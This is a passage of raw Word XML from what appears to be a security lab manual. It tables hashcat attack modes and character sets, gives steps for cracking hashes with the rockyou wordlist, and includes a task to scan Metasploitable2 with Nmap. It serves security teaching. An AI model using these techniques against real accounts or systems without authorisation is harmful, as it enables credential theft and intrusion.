            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>All printable ASCII characters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w14:paraId="17A3F2F8" w14:textId="77777777" w:rsidTr="00D44D6C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54DBFAD1" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>?b</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1631FCF2" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>All 8-bit characters (0x00–0xff)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16C17B4D" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRPr="00D44D6C" w:rsidRDefault="00D44D6C" w:rsidP="00D44D6C">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D44D6C">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Binary (rarely used for passwords)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60AAA359" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5743AF69" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4054D9DB" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51080DCB" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6EC1DF" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A98607F" w14:textId="3D060807" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Attack Modes in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96AA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-I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2"/>
        <w:gridCol w:w="1033"/>
        <w:gridCol w:w="2797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w14:paraId="4C0490B5" w14:textId="77777777" w:rsidTr="00D96AA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22BADDC7" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75DAD582" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Syntax</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673DE199" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w14:paraId="23D5D763" w14:textId="77777777" w:rsidTr="00D96AA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66305FB2" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16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68D417BD" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>-a 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B9F92F7" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Dictionary attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w14:paraId="45AC6331" w14:textId="77777777" w:rsidTr="00D96AA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DB4B9A5" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16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7942D01F" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>-a 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133725A8" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Combinator attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w14:paraId="1454BE61" w14:textId="77777777" w:rsidTr="00D96AA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01661B62" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16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45352424" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>-a 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B852FF" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Mask attack (brute-force style)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w14:paraId="242646EE" w14:textId="77777777" w:rsidTr="00D96AA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12185C7E" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16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4BA10BAA" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>-a 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4953F1" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Hybrid attack (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Dict</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> + Mask)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w14:paraId="5A1A3CB5" w14:textId="77777777" w:rsidTr="00D96AA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B7BCE08" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="079C043E" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>-a 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="075B7167" w14:textId="77777777" w:rsidR="00D96AA8" w:rsidRPr="00D96AA8" w:rsidRDefault="00D96AA8" w:rsidP="00D96AA8">
            <w:pPr>
              <w:spacing w:before="163"/>
              <w:ind w:left="306"/>
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">Hybrid attack (Mask + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Dict</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D96AA8">
              <w:rPr>
                <w:b/>
                <w:i/>
                <w:sz w:val="18"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75B16B15" w14:textId="77777777" w:rsidR="00D44D6C" w:rsidRDefault="00D44D6C">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329E41A2" w14:textId="32660E59" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="163"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>List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wordlists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available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on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 xml:space="preserve"> system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C489FA4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487591936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14031507" wp14:editId="554A79BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5393788" cy="64636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3788" cy="646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2154D6" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="165"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Copy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rockyou.txt to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your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current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directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC04BC4" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487592448" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="252D63D0" wp14:editId="595AEAB8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>104942</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2975316" cy="41910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5316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27769F" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="164"/>
        <w:ind w:left="306"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Display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cracked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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE7221" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487592960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FEB6B9D" wp14:editId="558C268C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1094739</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>102862</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5345907" cy="390906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5907" cy="390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6D1096" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="002D34AF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:sectPr w:rsidR="002D34AF">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="1133" w:bottom="280" w:left="1417" w:header="717" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2237F7" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="306"/>
        </w:tabs>
        <w:spacing w:before="80"/>
        <w:ind w:hanging="283"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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NMAP,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable2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web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applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9C0AA" w14:textId="77777777" w:rsidR="002D34AF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="306" w:right="274"/>
      </w:pPr>
      <w:r>
        <w:t>What</w:t>
      </w:r>
      <w:r>
        <w:rPr>
